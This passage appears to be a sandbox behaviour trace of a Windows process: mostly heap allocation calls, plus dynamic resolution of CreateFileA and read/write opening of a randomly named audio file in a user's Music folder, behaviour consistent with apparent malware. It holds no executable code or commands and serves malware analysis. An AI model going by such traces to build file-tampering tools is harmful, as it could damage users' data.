lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.635] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd90 [0037.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.635] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0037.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0037.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cd90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0037.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.636] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0037.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0037.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", cchWideChar=56, lpMultiByteStr=0x7c2080, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", lpUsedDefaultChar=0x0) returned 56 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.636] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\q_z7.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=56, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0037.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=56, lpWideCharStr=0x7db378, cchWideChar=56 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3") returned 56 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.638] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.640] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0037.640] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.641] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: 